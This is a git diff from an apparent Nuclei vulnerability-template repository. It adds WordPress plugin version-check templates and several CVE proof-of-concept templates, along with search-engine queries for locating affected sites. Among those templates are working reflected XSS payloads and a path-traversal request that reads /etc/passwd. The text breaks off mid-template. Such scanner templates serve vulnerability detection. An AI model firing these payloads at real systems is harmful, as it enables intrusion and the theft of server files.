./poc/sql/CVE-2024-11620-979089a4744c95c4c6431c18c0d453db.yaml +./poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml ./poc/sql/CVE-2024-1173-9e9606db29cc691b1619adba347c82df.yaml +./poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml ./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml ./poc/sql/CVE-2024-1293-affd9a0551db020dec750cedbcd3816e.yaml ./poc/sql/CVE-2024-1294-dfdb0dbdfc95da5675d873e172a0e0c4.yaml @@ -124457,6 +124677,7 @@ ./poc/sql/CVE-2024-3940-c77e604f97e35956017cf6a68db15f39.yaml ./poc/sql/CVE-2024-3952-e82e7f7b55b1a2cdb9c63c74403002dd.yaml ./poc/sql/CVE-2024-3954-d300f84586929db533ba549a8c5271bc.yaml +./poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml ./poc/sql/CVE-2024-39627-4a34ef4adb6554c40e87a30e6b5db2d1.yaml ./poc/sql/CVE-2024-39629-21a0d1e8bc7085b87d4ec991fcdbb5fd.yaml ./poc/sql/CVE-2024-3963-731de2d0a4c69dba27660c9868757277.yaml @@ -124694,6 +124915,10 @@ ./poc/sql/CVE-2024-53719-b4493181ccba3e1197dbf7fce74940cf.yaml ./poc/sql/CVE-2024-53721-b5cfee65491f0247c2f1fdb0949e9d6f.yaml ./poc/sql/CVE-2024-53726-1e919e9d2a69b020a76e46d4db30570d.yaml +./poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml +./poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml +./poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml +./poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml ./poc/sql/CVE-2024-5431-241e169fe8d70647db15866852ef1ef7.yaml ./poc/sql/CVE-2024-5441-ac5094c9721ab0d78dbe312bf4fbf927.yaml ./poc/sql/CVE-2024-5459-5fe3da3314db32ae5a24560dc5ca6f8d.yaml @@ -125550,6 +125775,7 @@ ./poc/sql/beescms_v3-login-sql-injection.yaml ./poc/sql/beescms_v4-login-sqli.yaml ./poc/sql/before-and-after-product-images-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml ./poc/sql/best-bootstrap-widgets-for-elementor-aedbca6edd060e8a69fdd7760bb9fe9f.yaml ./poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml ./poc/sql/betheme-71b13c5e1eda36a90193edb1421a40a0.yaml @@ -125582,6 +125808,7 @@ ./poc/sql/bft-autoresponder-410c06116fe1a48aeddb5876065bb3ed.yaml ./poc/sql/bigcommerce-e42ef8d39a3467d5e1a7baf1b678f8db.yaml ./poc/sql/bigcontact-d285769ee06ff62690a211e623fe0db4.yaml +./poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml ./poc/sql/bingle-3657db267ffb9fa9585f7dda5be77b5d.yaml ./poc/sql/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml ./poc/sql/bit-form-3d27ce4cf07eddb00a73dc6a8eb2fa2a.yaml @@ -125761,6 +125988,7 @@ ./poc/sql/canvas-85dba4da99018ec5002875cc774204af.yaml ./poc/sql/canvas-cc9db930f569b6837ab5aed1f9582e62.yaml ./poc/sql/canvasio3d-light-afe02b616299fe661a744ebe8dbd9776.yaml +./poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml ./poc/sql/captainform-bd412ac944fb4a7c5600d8dbbfb662bc.yaml ./poc/sql/captcha-d31b1c8c716a9d93fe1fbd75b1dbb125.yaml ./poc/sql/captcha-in-thai-a8aa19e5f73bcebc92ee846ddb45e746.yaml @@ -125836,6 +126064,7 @@ ./poc/sql/chatbot-b038bef7869b3706efa20fdb3d87a82d.yaml ./poc/sql/chatbot-b22ff0dbd98aa4f5a4d08888fadce284.yaml ./poc/sql/chatbot-e59db0430d299064f582993dd5ae7c3b.yaml +./poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml ./poc/sql/chaty-54b4df3ad52973902fbee4db2574a283.yaml ./poc/sql/chauffeur-booking-system-47b382c141e0bdf017dbc2d5f6a6abb1.yaml ./poc/sql/cherry-plugin-10e90184e935e318fb6118f56edb0f78.yaml @@ -125999,6 +126228,7 @@ ./poc/sql/contact-us-page-contact-people-34edb96c9ab0661038d2eccd212e324c.yaml ./poc/sql/contact-us-page-contact-people-bfa85b6db67d591aac2f6f71df4a2f6a.yaml ./poc/sql/contact-widgets-for-elementor-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml ./poc/sql/content-aware-sidebars-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/content-grabber-9cd8c8d91245df8880525bdb80e2a804.yaml ./poc/sql/content-protector-19b0cf5ebdbef78878d163d48f84b32e.yaml @@ -126066,6 +126296,7 @@ ./poc/sql/count-per-day-311cd82477fed81bb66239db49d949d3.yaml ./poc/sql/countdown-builder-466d118ca8f9a3617f4ecdb86e11688a.yaml ./poc/sql/countdown-time-d49b34cc4749bcddb6c0d98a35fdb653.yaml +./poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml ./poc/sql/counter-yandex-metrica-c194310014d30316dbbe28440ddf1a9d.yaml ./poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml ./poc/sql/country-state-city-auto-dropdown-dbb36fa80809f3531c17675200623d4b.yaml @@ -126100,6 +126331,7 @@ ./poc/sql/csz-cms-multiple-blind-sql-injection.yaml ./poc/sql/csz-cms-sqli.yaml ./poc/sql/cuisine-palace-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml ./poc/sql/currency-switcher-ddbcd2d90a5d069d6e14c0fea6254c46.yaml ./poc/sql/current-template-name-4e0b3f5938dbbcb7b6d25d649232d602.yaml ./poc/sql/curtain-cdf892b1bdb65554becd13f5d97445be.yaml @@ -127730,6 +127962,7 @@ ./poc/sql/myblogu-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/sql/mybooktable-4ef7dcbfb2a4ff3772362d316ebe9ddb.yaml ./poc/sql/mycred-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml ./poc/sql/mycred-e577923b04d9cbb1dba64e0256a4900d.yaml ./poc/sql/myriad-e7ede6314c209b97480a8f0916dbaa81.yaml ./poc/sql/mysql-default-login.yaml @@ -127911,6 +128144,7 @@ ./poc/sql/os-our-team-5e9ed8ddbc29a65b56b40fb1593a5b78.yaml ./poc/sql/ota-sync-booking-engine-widget-e6eadc3c1846bf39dbc1745d98cc5942.yaml ./poc/sql/otter-blocks-15c5581c7f12dbec33c590f64d738d01.yaml +./poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml ./poc/sql/out-of-stock-display-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/out-of-the-box-528db542bd643fe3ab8026c257a827c4.yaml ./poc/sql/overlay-image-divi-module-6477bf18cad6c823db485408d49b337b.yaml @@ -127961,6 +128195,7 @@ ./poc/sql/payment-gateway-payfabric-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/payment-gateway-stripe-and-woocommerce-integration-988d55592a55e8dbec9b2b183fa815e4.yaml ./poc/sql/payment-gateways-caller-for-wp-e-commerce-149513668ca0531327db1429515bc204.yaml +./poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml ./poc/sql/payplus-payment-gateway-a3aef2bebedbebc3212e421675dbad01.yaml ./poc/sql/paytium-176f9dc136ebe7ea745156cdb0054554.yaml ./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml @@ -128055,6 +128290,7 @@ ./poc/sql/pixgraphy-fd1668db1ee6120d9e9e1b481cd44501.yaml ./poc/sql/pixtypes-38d12a3ee1af1016d763a66f9b3fdb77.yaml ./poc/sql/player-c01dbc3d918342ab9261fcf9f834d00f.yaml +./poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml ./poc/sql/plugins-on-steroids-3c5e646c22c4a2ee0780b32e276ba0db.yaml ./poc/sql/pmb-sqli.yaml ./poc/sql/pmpro-ccbill-ca203c1416f8db65ff994af39c261ed6.yaml @@ -129250,6 +129486,8 @@ ./poc/sql/vbulletin-ajaxreg-sqli.yaml ./poc/sql/vbulletin-search-sqli.yaml ./poc/sql/verbalize-wp-d2642c9976dd79a81dbb8a04d84d3984.yaml +./poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml +./poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml ./poc/sql/viala-db2c68eeb70fb7b246821a2cd4518cb8.yaml ./poc/sql/video-conferencing-with-zoom-api-cada35bdbe5e2a0f3053da42343b771e.yaml ./poc/sql/video-contest-dcdbdb7c718f0791fb8fb1ab6aee662f.yaml @@ -129927,6 +130165,7 @@ ./poc/sql/wp-mail-smtp-pro-bf99af0b560ff84ba93dbeab4c84cecc.yaml ./poc/sql/wp-maintenance-mode-site-under-construction-3f94aced36dbd4328dad691c27a54184.yaml ./poc/sql/wp-media-folder-54aa91e59ecdb8a0126b1e5e8e9c3823.yaml +./poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml ./poc/sql/wp-megamenu-fe36f95770875e296f0157be9db6db9f.yaml ./poc/sql/wp-members-7aa36ba12939bcdb73e6e0450931851d.yaml ./poc/sql/wp-members-8db9f530e08181a4bd6b357664b8db50.yaml @@ -134208,6 +134447,7 @@ ./poc/web/wp-gotowebinar-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/wp-gotowebinar-plugin.yaml ./poc/web/wp-gotowebinar.yaml +./poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml ./poc/web/wp-webauthn-71441abab831c852cabdfcf51b578c3f.yaml ./poc/web/wp-webauthn-f28b000296f06a779e749742a94d7bfb.yaml ./poc/web/wp-webauthn.yaml @@ -135008,6 +135248,8 @@ ./poc/wordpress/formzu-wp-de3eef28bc5bff1cda8149a94e46b8a8.yaml ./poc/wordpress/formzu-wp.yaml ./poc/wordpress/forumwp-347948842ffe543c41596a9aa3dda87d.yaml +./poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml +./poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml ./poc/wordpress/forumwp.yaml ./poc/wordpress/fotawp-d622eb8bcbd4b333fcc853cc76fee77e.yaml ./poc/wordpress/fotawp.yaml @@ -135927,6 +136169,7 @@ ./poc/wordpress/smart-manager-for-wp-e-commerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/smart-manager-for-wp-e-commerce-plugin.yaml ./poc/wordpress/smart-manager-for-wp-e-commerce.yaml +./poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml ./poc/wordpress/smart-marketing-for-wp-ced803621ea0311a639aa79ba95d0a04.yaml ./poc/wordpress/smart-marketing-for-wp.yaml ./poc/wordpress/smartmag-responsive-retina-wordpress-magazine-cbf2c0f2049aa1f11e685ad27e85256f.yaml @@ -136018,6 +136261,7 @@ ./poc/wordpress/thinkit-wp-contact-form-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/thinkit-wp-contact-form-plugin.yaml ./poc/wordpress/thinkit-wp-contact-form.yaml +./poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml ./poc/wordpress/threewp-email-reflector-2b712155339ba6bb233ef4ca5805963a.yaml ./poc/wordpress/threewp-email-reflector.yaml ./poc/wordpress/transposh-translation-filter-for-wordpress-062cf6128cd71496bc9f9e8e75b9e3cb.yaml @@ -136083,6 +136327,7 @@ ./poc/wordpress/verbalize-wp.yaml ./poc/wordpress/verweise-wordpress-twitter-2964744389fb5f1e33539ac6baa901dc.yaml ./poc/wordpress/verweise-wordpress-twitter.yaml +./poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml ./poc/wordpress/videojs-html5-video-player-for-wordpress-4eb103ae150e63f14ea0465bbdd222cb.yaml ./poc/wordpress/videojs-html5-video-player-for-wordpress.yaml ./poc/wordpress/viewpoint-system-status-11016.yaml @@ -138542,6 +138787,7 @@ ./poc/wordpress/wp-filemanager.yaml ./poc/wordpress/wp-film-studio-49f13dc6fa66760ca1ff6d5f40c3291d.yaml ./poc/wordpress/wp-film-studio.yaml +./poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml ./poc/wordpress/wp-finder-xss-11445.yaml ./poc/wordpress/wp-finder-xss-11446.yaml ./poc/wordpress/wp-finder-xss-11447.yaml @@ -138834,6 +139080,7 @@ ./poc/wordpress/wp-hide-post.yaml ./poc/wordpress/wp-hide-security-enhancer-2a382d113b431bc3ea90b522ea6c775c.yaml ./poc/wordpress/wp-hide-security-enhancer-949cf036734f52d817c99198957fcd58.yaml +./poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml ./poc/wordpress/wp-hide-security-enhancer-a29eacb2489023acacd8d32ef00c49c5.yaml ./poc/wordpress/wp-hide-security-enhancer-c06d2ba4b1ea598192f9d0e4403a1daa.yaml ./poc/wordpress/wp-hide-security-enhancer-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -139414,6 +139661,7 @@ ./poc/wordpress/wp-marketing-automations.yaml ./poc/wordpress/wp-masquerade-6946da31a080f78d4bab5bc4d9e08e98.yaml ./poc/wordpress/wp-masquerade.yaml +./poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml ./poc/wordpress/wp-matrix-gallery-45ba464412c6ae4b94e80349ccf8b660.yaml ./poc/wordpress/wp-matrix-gallery.yaml ./poc/wordpress/wp-maximum-upload-file-size-04759a9a8f073cb18fdeda9c67898ae7.yaml @@ -139432,6 +139680,7 @@ ./poc/wordpress/wp-media-library-categories-903b1f7c933a9d3f4b81cfe33b593514.yaml ./poc/wordpress/wp-media-library-categories-c4833aaf804a0c4e273407342064eef1.yaml ./poc/wordpress/wp-media-library-categories.yaml +./poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml ./poc/wordpress/wp-media-player-e7ce5b48a56bb28689a18116ede2e190.yaml ./poc/wordpress/wp-media-player.yaml ./poc/wordpress/wp-mega-theme.yaml @@ -139485,6 +139734,7 @@ ./poc/wordpress/wp-menu-cart-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-menu-cart-plugin.yaml ./poc/wordpress/wp-menu-cart.yaml +./poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml ./poc/wordpress/wp-meta-and-date-remover-118904e8c976288b76d3619b8921ce5a.yaml ./poc/wordpress/wp-meta-and-date-remover-53a7dace1872d520f46fdcead285d0c8.yaml ./poc/wordpress/wp-meta-and-date-remover-6477bf18cad6c823db485408d49b337b.yaml @@ -140053,6 +140303,7 @@ ./poc/wordpress/wp-private-content-plus-225071e9ae085e01c69279c06acaae17.yaml ./poc/wordpress/wp-private-content-plus-345ac121f0293964f02d11db3261fea4.yaml ./poc/wordpress/wp-private-content-plus-73e3bc277a504f719dff9b56c8fe1187.yaml +./poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml ./poc/wordpress/wp-private-content-plus-8399cc72e60881a40af3ce56aada6cb9.yaml ./poc/wordpress/wp-private-content-plus-c291ca39b147b2ed889e3d6401deefb3.yaml ./poc/wordpress/wp-private-content-plus-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -141010,6 +141261,7 @@ ./poc/wordpress/wp-symposium.yaml ./poc/wordpress/wp-syntax-5fa1471b8621ae57e90a0948fa90499f.yaml ./poc/wordpress/wp-syntax.yaml +./poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml ./poc/wordpress/wp-t-wap-9502e7aea17c6e5cf70e43ae94018124.yaml ./poc/wordpress/wp-t-wap.yaml ./poc/wordpress/wp-table-6bfac4f1efb2b97f1bd23e30846a82a5.yaml diff --git a/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml b/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml new file mode 100644 index 0000000000..7f0398197f --- /dev/null +++ b/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml @@ -0,0 +1,59 @@ +id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db + +info: + name: > + Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/capitalize-my-title/" + google-query: inurl:"/wp-content/plugins/capitalize-my-title/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,capitalize-my-title,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "capitalize-my-title" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.5.3') \ No newline at end of file diff --git a/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml b/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml new file mode 100644 index 0000000000..07ba85af05 --- /dev/null +++ b/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml @@ -0,0 +1,59 @@ +id: cookielay-d1709b11e04e7ac0020e84fff5516e5a + +info: + name: > + Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cookielay/" + google-query: inurl:"/wp-content/plugins/cookielay/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cookielay,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cookielay" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.0') \ No newline at end of file diff --git a/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml b/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml new file mode 100644 index 0000000000..d97cca740d --- /dev/null +++ b/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml @@ -0,0 +1,59 @@ +id: mycred-b69b74183494c4b8dbaaa94b47c77a89 + +info: + name: > + myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mycred/" + google-query: inurl:"/wp-content/plugins/mycred/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mycred,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mycred" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.5.2') \ No newline at end of file diff --git a/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml b/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml new file mode 100644 index 0000000000..e8b9f808c0 --- /dev/null +++ b/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml @@ -0,0 +1,59 @@ +id: otp-login-59e25716cd4187f6ae0041590ffc4112 + +info: + name: > + Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/otp-login/" + google-query: inurl:"/wp-content/plugins/otp-login/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,otp-login,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "otp-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml b/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml new file mode 100644 index 0000000000..675b060fc7 --- /dev/null +++ b/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml @@ -0,0 +1,59 @@ +id: third-party-cookie-eraser-a95c341c56a938945d517c311512eb15 + +info: + name: > + Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/third-party-cookie-eraser/" + google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "third-party-cookie-eraser" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2011-4926-2089.yaml b/poc/cve/CVE-2011-4926-2089.yaml new file mode 100644 index 0000000000..fb9c699a3f --- /dev/null +++ b/poc/cve/CVE-2011-4926-2089.yaml @@ -0,0 +1,35 @@ +id: CVE-2011-4926 +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 + - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 + - http://www.openwall.com/lists/oss-security/2012/01/10/9 + classification: + cve-id: CVE-2011-4926 + metadata: + google-query: inurl:"/wp-content/plugins/adminimize/" + tags: cve,cve2011,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/CVE-2011-5181-2118.yaml b/poc/cve/CVE-2011-5181-2118.yaml new file mode 100644 index 0000000000..fb324d6a7d --- /dev/null +++ b/poc/cve/CVE-2011-5181-2118.yaml @@ -0,0 +1,25 @@ +id: CVE-2011-5181 +info: + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + tags: cve,cve2011,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000135-2681.yaml b/poc/cve/CVE-2016-1000135-2681.yaml new file mode 100644 index 0000000000..002bf598be --- /dev/null +++ b/poc/cve/CVE-2016-1000135-2681.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000135 + +info: + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin hdw-tube v1.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 + - https://wordpress.org/plugins/hdw-tube + - http://www.securityfocus.com/bid/93820 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000135 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2018-16283-3362.yaml b/poc/cve/CVE-2018-16283-3362.yaml new file mode 100644 index 0000000000..4c485ff4b7 --- /dev/null +++ b/poc/cve/CVE-2018-16283-3362.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-16283 + +info: + name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion + author: 0x240x23elu + severity: critical + description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. + reference: + - https://www.exploit-db.com/exploits/45438 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 + - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 + - http://seclists.org/fulldisclosure/2018/Sep/32 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-16283 + cwe-id: CWE-22 + tags: cve,cve2018,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + +# Enhanced by mp on 2022/04/26 diff --git a/poc/cve/CVE-2018-3810-3557.yaml b/poc/cve/CVE-2018-3810-3557.yaml new file mode 100644 index 0000000000..a09e1612c4 --- /dev/null +++ b/poc/cve/CVE-2018-3810-3557.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-3810 + +info: + name: WordPress Smart Google Code Inserter Authentication Bypass + author: princechaddha + severity: critical + reference: https://www.exploit-db.com/exploits/43420 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an 